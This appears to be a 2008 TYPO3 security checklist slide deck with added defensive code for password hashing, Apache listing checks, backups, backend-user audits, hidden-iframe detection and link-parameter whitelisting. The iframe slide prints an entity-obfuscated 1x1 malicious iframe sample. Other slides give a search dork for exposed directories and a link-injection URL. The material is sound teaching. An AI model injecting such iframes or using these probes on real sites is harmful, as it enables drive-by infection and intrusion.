Avoiding the bad guys

Security Checklist for TYPO3
International TYPO3 Conference
Berlin, 2008
TYPO3 has quite a good security history...
but ...


• TYPO3 is not „implement and forget“
• Regular checks and updates are required
Secure Passwords

• 9 or more characters
• Mixed upper/lowercase
• Do not use the same password everywhere
• Change regularly
• Passwords are stored as md5 hash, but...
md5.rednoize.com
md5 Hash Lookup
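The slide's point is that an unsalted MD5 hash of a password is only a lookup key: the same password always gives the same digest, so one precomputed table (such as the lookup site named above) answers for every installation. The following is an added example, not code from the talk or from TYPO3: it builds a tiny table from a constructed wordlist to show the reversal, then shows the salted, iterated PBKDF2 scheme that makes such tables useless. All password values here are constructed sample data.

```python
"""Why unsalted MD5 password storage is weak, and what a salted slow hash changes."""
import hashlib
import hmac
import os

# Constructed sample wordlist; real lookup services hold billions of entries.
COMMON_PASSWORDS = ["password", "123456", "typo3", "admin", "letmein"]


def md5_hex(password: str) -> str:
    """Unsalted MD5, the storage scheme the slide refers to."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def build_lookup(words) -> dict:
    """Precomputed digest -> password table; one MD5 per word serves every user everywhere."""
    return {md5_hex(w): w for w in words}


def reverse_md5(digest: str, table: dict):
    """Recover a password from its unsalted MD5 with a single dictionary lookup (None if unknown)."""
    return table.get(digest.lower())


def hash_password(password: str, salt=None, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256: a fresh random salt per user and many iterations."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup(COMMON_PASSWORDS)
    stolen_digest = md5_hex("typo3")                 # what an unsalted MD5 column would hold
    print("md5 reversed to:", reverse_md5(stolen_digest, table))
    record = hash_password("typo3")
    print("pbkdf2 record:", record)
    print("verify correct password:", verify_password("typo3", record))
    print("verify wrong password:", verify_password("Typo3!", record))
```

The two hash_password records for the same password differ because each carries its own salt, so a table built from one site's dump cannot be reused against another; the iteration count additionally makes each guess expensive.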
Disable Directory Listing
• in httpd.conf change
  Options All Indexes FollowSymLinks
  to
  Options All FollowSymLinks
• Google Search
  intitle:"index of" "last modified" size
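A configuration check a practitioner will want to run on the whole httpd.conf rather than on one line, added here as an example and not part of the talk. One caveat worth knowing: in Apache the `All` keyword means every option except MultiViews, so it includes `Indexes`, and a line such as `Options All FollowSymLinks` still permits listings. The safe forms name the options explicitly (`Options FollowSymLinks`) or subtract the feature (`Options -Indexes`). The scanner below handles all three Apache syntaxes (plain keyword list, `+`/`-` relative form, and `All`/`None`); the config fragment is constructed sample data.

```python
"""Report Apache Options directives that leave directory listing (Indexes) enabled."""
import re

OPTIONS_RE = re.compile(r"^\s*Options\s+(.*?)\s*$", re.IGNORECASE)


def options_enable_indexes(args: str) -> bool:
    """True if this Options argument list ends with Indexes switched on.

    Tokens are applied left to right: 'All' (which includes Indexes) or 'Indexes'
    switch it on, '-Indexes' or 'None' switch it off.
    """
    enabled = False
    for tok in args.split():
        sign, name = (tok[0], tok[1:]) if tok[0] in "+-" else ("+", tok)
        name = name.lower()
        if name in ("indexes", "all"):
            enabled = sign == "+"
        elif name == "none":
            enabled = False
    return enabled


def find_listing_enabled(conf_text: str) -> list:
    """(line_number, line) for every Options directive that enables Indexes."""
    hits = []
    for n, line in enumerate(conf_text.splitlines(), start=1):
        m = OPTIONS_RE.match(line.split("#", 1)[0])        # ignore trailing comments
        if m and options_enable_indexes(m.group(1)):
            hits.append((n, line.strip()))
    return hits


# Constructed httpd.conf fragment (sample data, not a real server's config).
SAMPLE_CONF = """\
# constructed example
<Directory /var/www/html>
    Options All Indexes FollowSymLinks
</Directory>
<Directory /var/www/html/fileadmin>
    Options All FollowSymLinks
</Directory>
<Directory /var/www/html/typo3conf>
    Options -Indexes +FollowSymLinks
</Directory>
<Directory /var/www/html/uploads>
    Options FollowSymLinks   # listing off: Indexes is simply not granted
</Directory>
"""

if __name__ == "__main__":
    for n, line in find_listing_enabled(SAMPLE_CONF):
        print(f"line {n}: listing still enabled: {line}")
```

Lines 3 and 6 of the sample are reported; line 6 is exactly the "fixed" form from the slide, which is why naming options explicitly is the safer habit.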
Backup Your Data
• Regularly (cronjob)
• Directories: fileadmin, typo3conf, uploads
• Database: mysqldump --opt > filename
• Not only for the last one or two days
• Copy or download to external media
• Verify!
• Do not store inside docroot
also check for
www.domain.com/../system/
not being accessible
database.sql
md5.rednoize.com
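The backup slide and the "also check for" slide describe one procedure: dump the database, archive fileadmin/typo3conf/uploads, keep more than the last couple of generations, store the result outside the docroot so a file like database.sql can never be fetched over HTTP, and verify. The following is an added example and not the talk's own script. It assumes a TYPO3 docroot at DOCROOT, a backup directory outside it, and a local mysqldump with credentials kept in ~/.my.cnf; those paths are placeholders to adjust. The self_check() function runs the round trip on a constructed throwaway docroot.

```python
"""Backup routine for the TYPO3 directories and database named on the slide."""
import hashlib
import shlex
import tarfile
import tempfile
import time
from pathlib import Path

TYPO3_DIRS = ("fileadmin", "typo3conf", "uploads")   # the directories from the slide
DOCROOT = "/var/www/html"                             # assumed path, adjust to your host
BACKUP_DIR = "/var/backups/typo3"                     # deliberately outside the docroot


def is_inside(path, root) -> bool:
    """True if path resolves to root itself or to something below it."""
    p, r = Path(path).resolve(), Path(root).resolve()
    return p == r or r in p.parents


def mysqldump_command(db: str, user: str, out_file: str) -> str:
    """The slide's dump step (mysqldump --opt > file); the password comes from ~/.my.cnf, not argv."""
    return f"mysqldump --opt --user={shlex.quote(user)} {shlex.quote(db)} > {shlex.quote(out_file)}"


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def archive_dirs(docroot: str, dest_dir: str, stamp: str) -> Path:
    """Tar the TYPO3 directories into dest_dir, refusing any destination under the docroot."""
    if is_inside(dest_dir, docroot):
        raise ValueError(f"refusing to store backups inside the docroot: {dest_dir}")
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    archive = dest / f"typo3-files-{stamp}.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        for name in TYPO3_DIRS:
            src = Path(docroot) / name
            if src.is_dir():
                tar.add(src, arcname=name)
    return archive


def write_manifest(files, manifest: Path) -> None:
    """Record a SHA-256 per archive so the 'Verify!' step has something to check against."""
    manifest.write_text("".join(f"{sha256_file(f)}  {f.name}\n" for f in files))


def verify_manifest(manifest: Path) -> list:
    """Names that are missing or whose hash no longer matches the manifest (empty list = OK)."""
    bad = []
    for line in manifest.read_text().splitlines():
        digest, name = line.split("  ", 1)
        target = manifest.parent / name
        if not target.exists() or sha256_file(target) != digest:
            bad.append(name)
    return bad


def prune_old(dest_dir: str, keep_days: int) -> list:
    """Delete archives older than keep_days; many generations survive, not just the last one or two."""
    cutoff = time.time() - keep_days * 86400
    removed = []
    for f in Path(dest_dir).glob("typo3-files-*.tar.gz"):
        if f.stat().st_mtime < cutoff:
            f.unlink()
            removed.append(f.name)
    return removed


def self_check() -> dict:
    """Round trip on a constructed docroot: archive, verify, damage the copy, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = Path(tmp) / "htdocs"
        (docroot / "fileadmin").mkdir(parents=True)
        (docroot / "fileadmin" / "logo.png").write_bytes(b"constructed sample content")
        backups = Path(tmp) / "backups"               # sibling of the docroot, not below it
        archive = archive_dirs(str(docroot), str(backups), "20080101")
        manifest = backups / "SHA256SUMS"
        write_manifest([archive], manifest)
        clean = verify_manifest(manifest)
        with open(archive, "ab") as f:
            f.write(b"\x00")                          # simulate a truncated or corrupted copy
        damaged = verify_manifest(manifest)
        try:
            archive_dirs(str(docroot), str(docroot / "backup"), "bad")
            refused = False
        except ValueError:
            refused = True
    return {"clean": clean, "damaged": damaged, "refused_inside_docroot": refused}


if __name__ == "__main__":
    print(self_check())
    print(mysqldump_command("typo3", "backup", f"{BACKUP_DIR}/typo3-db.sql"))
```

Run the dump command and archive_dirs from the cron job, write the manifest, then copy the archive plus manifest to external media and run verify_manifest there as well: a hash that matches at the source but not on the copy is exactly the failure "Verify!" is meant to catch.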
Backend Users
• Editors should NEVER have admin rights
• Check list of BE users for valid entries
• Temporary editors (students, contract
  workers): set expiration date for account
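The three checks on this slide map directly onto columns of TYPO3's be_users table: admin (admin rights), endtime (account expiry) and lastlogin, with disable and deleted marking accounts TYPO3 no longer treats as live; all timestamps are Unix seconds. The audit below is an added example, not TYPO3 code. It runs against an in-memory SQLite copy of that table filled with constructed rows; the same three SELECT statements can be pointed at the live MySQL table to review a real installation.

```python
"""Audit TYPO3 backend accounts: admins, editors without expiry, long-unused logins."""
import sqlite3
import time

DAY = 86400
ACTIVE = "deleted = 0 AND disable = 0"      # rows TYPO3 treats as live accounts


def sample_connection(now: int) -> sqlite3.Connection:
    """In-memory be_users with TYPO3's column names and constructed, invented users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE be_users (
        uid INTEGER PRIMARY KEY, username TEXT, admin INTEGER DEFAULT 0,
        disable INTEGER DEFAULT 0, deleted INTEGER DEFAULT 0,
        endtime INTEGER DEFAULT 0, lastlogin INTEGER DEFAULT 0)""")
    rows = [
        # uid, username,     admin, disable, deleted, endtime,        lastlogin
        (1, "admin",         1, 0, 0, 0,              now - 2 * DAY),
        (2, "editor_anna",   0, 0, 0, 0,              now - 10 * DAY),   # editor, no expiry
        (3, "student_tmp",   0, 0, 0, now + 30 * DAY, now - 1 * DAY),    # expiry set: fine
        (4, "contractor",    1, 0, 0, 0,              now - 400 * DAY),  # admin and long unused
        (5, "old_editor",    0, 1, 0, 0,              now - 900 * DAY),  # already disabled
        (6, "gone",          0, 0, 1, 0,              0),                # soft-deleted
    ]
    conn.executemany("INSERT INTO be_users VALUES (?,?,?,?,?,?,?)", rows)
    return conn


def _names(conn, sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]


def admins(conn):
    """Every live account with admin rights; each should be a known administrator, never an editor."""
    return _names(conn, f"SELECT username FROM be_users WHERE {ACTIVE} AND admin = 1 "
                        "ORDER BY username")


def editors_without_expiry(conn):
    """Live non-admin accounts with no endtime; temporary staff must not appear here."""
    return _names(conn, f"SELECT username FROM be_users WHERE {ACTIVE} AND admin = 0 "
                        "AND endtime = 0 ORDER BY username")


def stale_accounts(conn, now, max_idle_days=180):
    """Live accounts that never logged in or not within max_idle_days: candidates for removal."""
    cutoff = now - max_idle_days * DAY
    return _names(conn, f"SELECT username FROM be_users WHERE {ACTIVE} "
                        "AND (lastlogin = 0 OR lastlogin < ?) ORDER BY username", (cutoff,))


def audit(conn, now) -> dict:
    return {
        "admins": admins(conn),
        "editors_without_expiry": editors_without_expiry(conn),
        "stale": stale_accounts(conn, now),
    }


if __name__ == "__main__":
    now = int(time.time())
    for key, names in audit(sample_connection(now), now).items():
        print(f"{key}: {names}")
```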
FTP Accounts
• Only give access to fileadmin/user_upload/...
When crisis strikes...
• „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their "greeting".“
iframe Attacks
    <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;'
            width=1 height=1>
    </iframe>
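The injected frame on the slide shows the two tell-tale signs a defender can search for: a 1x1 size and a src written as decimal HTML entities, so that grepping templates and database content for the hostname finds nothing. Below is an added example, not code from the talk, that decodes entities before judging each iframe and flags tiny, CSS-hidden or off-site frames. The sample page is constructed, including the hostname malware.example.invalid; it is not the slide's real payload.

```python
"""Find hidden or entity-obfuscated iframes in rendered HTML or stored content."""
import html
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(raw: str) -> dict:
    """Attribute name -> value with HTML entities decoded (&#104;&#116;... becomes 'ht...')."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = html.unescape(value).strip()
    return attrs


def _px(value: str, default: int = 100) -> int:
    """'1' or '1px' -> 1; empty or non-numeric values fall back to the default."""
    digits = re.sub(r"px$", "", value.strip().lower())
    return int(digits) if digits.isdigit() else default


def is_suspicious(attrs: dict, own_hosts) -> list:
    """Reasons this iframe deserves review; an empty list means it passes."""
    reasons = []
    if _px(attrs.get("width", "")) <= 1 or _px(attrs.get("height", "")) <= 1:
        reasons.append("tiny size")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden by css")
    host = urlparse(attrs.get("src", "")).hostname
    if host and host not in own_hosts:
        reasons.append(f"off-site src {host}")
    return reasons


def scan(page: str, own_hosts) -> list:
    """Every suspicious iframe in page, with its decoded src and the reasons."""
    findings = []
    for m in IFRAME_RE.finditer(page):
        attrs = parse_attrs(m.group(1))
        reasons = is_suspicious(attrs, own_hosts)
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


def entity_encode(text: str) -> str:
    """The obfuscation used on the slide: every character as a decimal entity."""
    return "".join(f"&#{ord(c)};" for c in text)


# Constructed sample page: one legitimate own-host embed, one hidden injected frame.
SAMPLE_PAGE = f"""<html><body>
<iframe src="https://www.example.com/video" width="640" height="360"></iframe>
<p>content</p>
<iframe
 src='{entity_encode("http://malware.example.invalid/dl/x.php")}' width=1 height=1>
</iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE, {"www.example.com"}):
        print(finding)
```

Run scan over a fetched copy of each page as well as over the tt_content and template records in the database: an injection that lives only in the database shows up in both, one that lives in a tampered template file shows up only in the rendered page.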
Link Manipulation

• www.domain.com/index.php&L=2&www.badsite.com
• Limit range of linkVars:
  config.linkVars = L(0-4)
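config.linkVars decides which incoming GET parameters TYPO3 carries into every link it generates; without a value restriction, whatever a visitor appended to the URL is reflected into all links on the page. The code below is an added example and a deliberately small reimplementation of that idea, not TYPO3's own linkVars code: it parses the three value forms from the TYPO3 reference, `(int)` for any integer, `(0-4)` for an integer range and `(a|b)` for an explicit list, and drops every parameter that is not declared or whose value fails its rule. The parameter names and query strings used are constructed.

```python
"""Whitelist which GET parameters, and which values, may be carried into generated links."""
import re
from urllib.parse import urlencode

ENTRY_RE = re.compile(r"^\s*([A-Za-z0-9_\[\]-]+)\s*(?:\((.*)\))?\s*$")
INT_RE = re.compile(r"-?\d+")


def parse_linkvars(spec: str) -> dict:
    """'L(0-4), print(int), layout(default|mobile)' -> {name: rule}.

    rule is None (any value), 'int', an (lo, hi) tuple, or a set of allowed strings.
    """
    rules = {}
    for entry in spec.split(","):
        if not entry.strip():
            continue
        m = ENTRY_RE.match(entry)
        if not m:
            raise ValueError(f"bad linkVars entry: {entry!r}")
        name, cond = m.group(1), m.group(2)
        if cond is None:
            rules[name] = None
        elif cond == "int":
            rules[name] = "int"
        elif re.fullmatch(r"-?\d+-\d+", cond):
            lo, hi = cond.rsplit("-", 1)
            rules[name] = (int(lo), int(hi))
        else:
            rules[name] = set(cond.split("|"))
    return rules


def value_allowed(rule, value: str) -> bool:
    if rule is None:
        return True
    if rule == "int":
        return INT_RE.fullmatch(value) is not None
    if isinstance(rule, tuple):
        return INT_RE.fullmatch(value) is not None and rule[0] <= int(value) <= rule[1]
    return value in rule


def filter_link_vars(rules: dict, query: dict) -> dict:
    """Keep only declared parameters whose values pass their rule; everything else is dropped."""
    return {k: v for k, v in query.items() if k in rules and value_allowed(rules[k], v)}


def build_link(path: str, rules: dict, query: dict) -> str:
    """Generate a site link that carries only the permitted parameters."""
    kept = filter_link_vars(rules, query)
    return path + ("?" + urlencode(kept) if kept else "")


if __name__ == "__main__":
    rules = parse_linkvars("L(0-4), print(int), layout(default|mobile)")
    # Constructed request: a valid language id plus two injected parameters.
    incoming = {"L": "2", "www.badsite.com": "", "layout": "<script>"}
    print(build_link("index.php", rules, incoming))
```

With the slide's setting `L(0-4)` the language parameter survives only when it is an integer between 0 and 4; a value such as `2www.badsite.com`, an out-of-range `9`, or an undeclared parameter never reaches the generated links.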
Further Information

• TYPO3 Security Cookbook
  available at typo3.org/teams/security/
• TYPO3 announce list
  available at lists.netfielders.de
Questions?
